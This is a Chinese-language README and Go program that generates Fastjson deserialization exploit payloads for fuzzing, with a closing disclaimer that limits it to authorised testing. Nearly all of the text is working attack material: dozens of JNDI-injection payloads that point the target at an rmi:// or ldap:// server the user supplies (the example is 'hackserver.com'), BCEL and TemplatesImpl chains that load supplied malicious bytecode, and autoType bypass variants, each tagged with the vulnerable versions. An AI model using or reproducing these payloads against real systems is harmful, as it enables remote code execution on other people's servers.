What
无第三方依赖
收集了网络上的多种payload,方便进行fuzz测试
提供了自动替换payload的功能,一次性为所有payload插入rmi地址/dnslog
Help
--list
:以清单的形式打印,方便作为字典进行fuzz
--address
:服务器地址(无需rmi://前缀),如11.22.33.44/exp、eval.com/rce
--dns
:dnslog的地址,不同payload会添加不同的子域名,方便查看是哪一条payload
--code
:加载恶意类的code,需要自行添加$$BCEL$$的开头
Example
FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com
FjsonShowPload.exe --address hackserver.com --dns dnslog.com
注意:重定向到文件后,需要去掉banner和结尾的确认信息,或者直接在代码中去除
How
将代码保存为 FjsonSoPload.go
进入命令行窗口:go build ./
即可得到一个 FjsonSoPload.exe
Code
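package main

import (
	"flag"
	"fmt"
)

// Package-level state shared by the payload builders and the printer.
//
// main copies the parsed flags into code, Address and dnslog; every Show_* /
// Bypass* function then fills Pal, Hep and Vson before each ShowPayload call.
var (
	id = 1      // running PayloadID printed in detail mode
	dt = false  // detail mode; set to the inverse of --list in main
	cl = true   // not read anywhere in this file; kept so the package layout is unchanged
	code    string // --code: class bytes the user supplies, "$$BCEL$$" prefix included
	Address string // --address: host[:port]/path used after rmi:// and ldap://, no scheme
	dnslog  string // --dns: DNS log domain; each payload prepends its own label
	Pal, Hep, Vson string // current payload, its description, and the version range it was checked against
)

// main prints the banner, parses the flags, and walks the payload groups in
// the original order. The deferred Println echoes the substituted inputs after
// the listing so a redirected run shows what was inserted.
func main() {
	fmt.Println(" ████████ ██ ████████ ██ ███████ ██ ██\n░██░░░░░ ░░ ██░░░░░░ ░██ ░██░░░░██ ░██ ░██\n░██ ██ ██████ ██████ ███████ ░██ ░██ ██████ ███ ██░██ ░██ ░██ ██████ ██████ ░██\n░███████ ░██ ██░░░░ ██░░░░██░░██░░░██░█████████░██████ ██░░░░██░░██ █ ░██░███████ ░██ ██░░░░██ ░░░░░░██ ██████\n░██░░░░ ░██░░█████ ░██ ░██ ░██ ░██░░░░░░░░██░██░░░██░██ ░██ ░██ ███░██░██░░░░ ░██░██ ░██ ███████ ██░░░██\n░██ ██░██ ░░░░░██░██ ░██ ░██ ░██ ░██░██ ░██░██ ░██ ░████░████░██ ░██░██ ░██ ██░░░░██ ░██ ░██\n░██ ░░███ ██████ ░░██████ ███ ░██ ████████ ░██ ░██░░██████ ███░ ░░░██░██ ███░░██████ ░░████████░░██████\n░░ ░░░ ░░░░░░ ░░░░░░ ░░░ ░░ ░░░░░░░░ ░░ ░░ ░░░░░░ ░░░ ░░░ ░░ ░░░ ░░░░░░ ░░░░░░░░ ░░░░░░ \n")

	detail := flag.Bool("list", false, "不展示payload细节与利用方式(默认展示)")
	code2 := flag.String("code", "恶意code", "恶意code,自行添加$$BCEL$$开头")
	dnslog2 := flag.String("dns", "default.com", "dnslog")
	Address2 := flag.String("address", "127.0.0.1/exp", "rmi/ldap地址(无需带协议名)")
	flag.Parse()

	// --list means "list only", so detail mode is the inverse of the flag.
	dt = !(*detail)
	dnslog = *dnslog2
	code = *code2
	Address = *Address2
	defer fmt.Println("\nYour input :", dnslog, " | ", Address)

	// BasicDataSource -> BCEL, both tomcat-dbcp package versions
	Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource()
	// JdbcRowSetImpl -> JNDI
	Show_com_sun_rowset_JdbcRowSetImpl()
	// JdbcRowSetImpl -> JNDI, bypass for 1.2.25
	Bypass25_41_com_sun_rowset_JdbcRowSetImpl()
	// JdbcRowSetImpl -> JNDI, bypass for 1.2.41--1.2.42
	Bypass41_42_com_sun_rowset_JdbcRowSetImpl()
	// cache bypass, < 1.2.47 (template kept from the original source):
	//{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://ip:9999/exp", "autoCommit": true}}
	// BCEL chain bypass
	Bypass25_41_BasicDataSource()
	other()
	//fmt.Println("\nspring\\tomcat Echo")
}

// Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource prints the two
// BasicDataSource/BCEL ClassLoader entries (tomcat-dbcp "dbcp" and "dbcp2"
// packages). Both embed the --code value as driverClassName.
func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {
	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`
	Hep = `BCEL加载恶意字节码的利用链,正连加载恶意字节码,无需出网`
	Vson = `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`
	ShowPayload(Pal, Hep, Vson)
}

// Show_com_sun_rowset_JdbcRowSetImpl prints the plain JdbcRowSetImpl entries:
// one each for rmi:// and ldap:// (using --address) and one dns:// entry
// whose label "poc1." is prepended to --dns so the source of a DNS hit can be
// told apart from the other groups.
func Show_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	// ldap
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	// dnslog
	Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://poc1.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass25_41_BasicDataSource prints the dbcp2 BasicDataSource entry with the
// class names written in "L...;" descriptor form.
func Bypass25_41_BasicDataSource() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `BCEL利用链exp,正连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)
}

// other prints the remaining entries. Each JNDI gadget class gets an rmi://,
// an ldap:// and a dns:// variant (the dns label differs per class so a log
// hit identifies the class), followed by the class-loading entries that embed
// --code. The "@type" class names in these strings are the identifiers an
// autoType denylist or a request-inspection rule keys on; the commented
// template above each group is the original author's reference form and is
// kept verbatim. Strings are reproduced exactly as in the original source.
func other() {
	//{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"$type$://$ip$/payload2","autoCommit":true}} #Fastjson <=1.2.24
	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"dns://ubm.` + dnslog + `","autoCommit":true}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson <= 1.2.24`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload3","autoCommit":true} #Fastjson<=1.2.41
	//{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload4","autoCommit":true} #Fastjson<=1.2.42
	//{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"$type$://$ip$/payload5","autoCommit":true} #Fastjson<=1.2.43
	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"dns://mik.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.43`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"$type$://$ip$/payload6"}} #Fastjson<=1.2.45
	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"dns://jds.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.45`
	ShowPayload(Pal, Hep, Vson)

	//{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$type$://$ip$/payload7","autoCommit":true}} #Fastjson<=1.2.47
	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://dbjn.` + dnslog + `","autoCommit":true}}`
	Hep = `dnsliog`
	Vson = `Fastjson<=1.2.47`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"$type$://$ip$/payload8"} #Fastjson<=1.2.62,CVE-2020-8840
	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://cben.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.62`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"$type$://$ip$/payload9"} #Fastjson<=1.2.66
	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"dns://igjt.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"$type$://$ip$/payload10"} #Fastjson<=1.2.66
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"dns://atbc.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload11"}} #Fastjson<=1.2.66
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns://eget.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.66`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload12"} #Fastjson<=1.2.67
	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns://antr.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["$type$://$ip$/payload13"],"Realms":[""]} #Fastjson<=1.2.67
	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["rmi://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://` + Address + `"],"Realms":[""]}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["dns://siro.` + dnslog + `"],"Realms":[""]}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.caucho.config.types.ResourceRef","lookupName":"$type$://$ip$/payload14"} #Fastjson<=1.2.67
	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"dns://caco.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload15"}} #Fastjson<=1.2.67
	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"dns://jti.` + dnslog + `"}}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.67`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"$type$://$ip$/payload16"} #Fastjson<=1.2.68
	// Scheme/label assignment in this group is reproduced as in the original source.
	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"dns://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://w9.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"$type$://$ip$/payload17"} #Fastjson<=1.2.68
	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://` + Address + `"}`
	Hep = `JNDI注入-exp`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns://ppx.` + dnslog + `"}`
	Hep = `JNDI注入-dnslog`
	Vson = `Fastjson<=1.2.68`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"$type$://$ip$/payload18"} #未知
	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://` + Address + `"}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns://cons.` + dnslog + `"}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"$type$://$ip$/payload19","rollbackOnly":null} #未知
	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"ldap://` + Address + `","rollbackOnly":null}`
	Hep = `jndi`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns://openjpa.` + dnslog + `","rollbackOnly":null}`
	Hep = `dnslog`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload20"} #未知
	Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`
	Hep = `bcel`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)

	//TemplatesImpl2.tpl:
	//{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}
	Pal = `{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`
	Hep = `加载恶意类`
	Vson = `未知`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass25_41_com_sun_rowset_JdbcRowSetImpl prints the JdbcRowSetImpl entries
// with the class name in "L...;" descriptor form; the dns variant uses the
// "poc2." label.
func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	// ldap
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)

	// dnslog
	Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后加L与;进行绕过`
	Vson = `Fastjson < 1.2.41`
	ShowPayload(Pal, Hep, Vson)
}

// Bypass41_42_com_sun_rowset_JdbcRowSetImpl prints the JdbcRowSetImpl entries
// with the "L" and ";" doubled ("LL...;;"). The dns variant reuses the "poc2."
// label of the previous group, as in the original source. Note the leading
// space in the first Vson string; it is reproduced as written.
func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {
	//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-RMI利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = ` 1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	// ldap
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	// dnslog
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)
}

// ShowPayload prints one entry. str[0] is the payload, str[1] its description
// and str[2] the version range. In list mode (dt == false) only the payload
// line is printed, so the output can be used directly as a wordlist. In
// detail mode the entry is boxed, numbered with id (which is incremented),
// and the payload is wrapped in ANSI red.
//
// Missing trailing arguments are treated as empty strings instead of
// indexing past the end of str.
func ShowPayload(str ...string) {
	const redColor = "\033[31m"
	const resetColor = "\033[0m"

	// Pad so str[0..2] are always addressable; the original panicked on a
	// short call in detail mode.
	for len(str) < 3 {
		str = append(str, "")
	}

	if !dt {
		fmt.Println(str[0])
		return
	}

	fmt.Println("┌─────────PayloadID:", id)
	id++
	fmt.Printf("%s%s%s\n", redColor, str[0], resetColor)

	fmt.Println("│\n├───[+]payload说明:")
	fmt.Print("│ ")
	fmt.Println(str[1])

	fmt.Println("│\n├───[+]验证过的版本:")
	fmt.Print("│ ")
	fmt.Println(str[2])
	fmt.Println("│ 注:版本号仅供参考 Fastjson SEC──┐")

	// Box footer; printed last, which is when the original's defer fired.
	fmt.Println("└──────────────────────────────────────────────────────────────────────────────┘\n")
}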
相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。